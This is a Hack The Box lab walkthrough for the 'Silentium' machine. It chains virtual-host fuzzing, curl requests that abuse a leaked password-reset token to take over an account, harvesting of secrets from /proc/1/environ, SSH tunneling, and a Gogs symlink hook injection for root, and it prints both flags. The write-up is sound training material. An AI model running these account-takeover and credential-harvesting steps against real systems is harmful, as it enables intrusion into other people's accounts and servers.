Hack The Box

Silentium

HTBEasyLinuxWebAPIPrivEsc

Summary

Silentium is an Easy Linux machine solved through chaining rather than a single exploit. Virtual host fuzzing reveals a staging subdomain whose forgot-password API leaks a temporary reset token, enabling an account takeover and SSH access as ben. Local enumeration of /proc/1/environ exposes secrets and an internal service on port 3001, reached via SSH tunneling: an internal Gogs instance, exploited through a symlink hook injection to escalate to root.

Machine Information

Name	Difficulty	OS	Platform
Silentium	Easy	Linux	Hack The Box

Attack Path

Nmap reveals SSH and HTTP.
Virtual host fuzzing discovers staging.silentium.htb.
The staging API leaks a password-reset token via forgot-password.
The token is used to reset ben's password (account takeover).
SSH access is obtained as ben.
/proc/1/environ exposes secrets and an internal service on port 3001.
SSH tunneling reaches the internal Gogs instance.
A Gogs symlink hook injection escalates to root.

Reconnaissance

Initial enumeration was performed with Nmap.

nmap -sC -sV -A -T4 10.129.27.123

Nmap Scan

Only SSH (22) and HTTP (80) were open, with a redirect to http://silentium.htb/ — a strong hint of virtual host routing and possible hidden subdomains.

Web Enumeration

After adding the host to /etc/hosts, the main application was a clean corporate site with no obvious functionality, suggesting the real surface lay in a subdomain or API.

Main page

Subdomain Discovery

Virtual host fuzzing was performed with ffuf against the Host header.

ffuf -u http://silentium.htb/ \
  -H "Host: FUZZ.silentium.htb" \
  -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
  -fs 8753 -mc 200

Subdomain fuzzing

This revealed staging.silentium.htb — typically a less hardened environment and a good candidate for logic flaws.

API Enumeration

The staging environment exposed an authentication interface and, more importantly, a password-recovery endpoint.

curl -s -X POST http://staging.silentium.htb/api/v1/account/forgot-password \
  -H "Content-Type: application/json" \
  -d '{"user":{"email":"ben@silentium.htb"}}'

Forgot password

Instead of a generic response, the API returned sensitive account data, including a tempToken. Leaking the reset token to the client breaks the entire recovery mechanism and enables account takeover.

Exploitation — Password Reset Abuse

With the leaked tempToken, the reset endpoint accepted a new password for the target account.

curl -i -X POST http://staging.silentium.htb/api/v1/account/reset-password \
  -H "Content-Type: application/json" \
  -d '{
    "user": {
      "email": "ben@silentium.htb",
      "tempToken": "EFSKdWfe8hE1MrLobGKklbHsF8xDTZMafc809hCVpg8SZxgTxf...",
      "password": "NewPass123!",
      "confirmPassword": "NewPass123!"
    }
  }'

Password reset

The password change succeeded — a pure business-logic flaw turning user enumeration into full account control.

Initial Access

With the new credentials, SSH access was obtained as ben.

ssh ben@10.129.23.208

SSH access

Privilege Escalation

Enumeration

Reading the init process environment exposed secrets and pointed at an internal service.

cat /proc/1/environ

Environment variables

It revealed values such as SMTP_PASSWORD, JWT_SECRET, JWT_REFRESH_TOKEN_SECRET, Flowise parameters, and an internal service listening on port 3001.

Pivoting to the internal Gogs

An SSH tunnel exposed the internal service locally.

ssh -L 3001:127.0.0.1:3001 ben@10.129.25.77

Port forwarding

The service on port 3001 was an internal Gogs (self-hosted Git) instance.

Gogs

Gogs symlink hook injection

Gogs was exploited via a symlink hook injection chain: authenticate, create a controlled repository, inject a malicious structure with a symlink, and trigger a Git hook that writes/executes a payload on the host. The exploit produced a SUID artifact and a shell with euid=0, confirming root.

Privilege escalation

Flags

User

cat /home/ben/user.txt

e6dca8e69b324f1a217f4e796d1ff922

Root

cat /root/root.txt

f08e07e784230fd8108e8ebcf1a9e861

Vulnerabilities Identified

Information Disclosure in Password Recovery

forgot-password returned internal account data and a reset token that should never reach the client.

Impact: user enumeration and exposure of the secret reset token.

Password Reset Logic Flaw

The reset endpoint accepted the leaked token as sufficient proof, allowing another user's password to be changed.

Impact: full account takeover.

Secrets Exposed in Environment Variables

Credentials and keys were readable in the process environment.

Impact: mapping of internal architecture and pivoting to internal services.

Privileged Internal Gogs

The internal Gogs instance was exploitable via symlink hook injection.

Impact: privilege escalation to root.

Tools Used

Nmap
ffuf
curl
SSH
Public Gogs exploit / PoC

Key Takeaways

Staging environments are often the least hardened part of the infrastructure.
Business-logic flaws can be more dangerous than classic memory or injection bugs.
A user foothold mainly serves to reveal the real internal architecture.
Services bound to localhost are not safe once an attacker has a shell and can tunnel.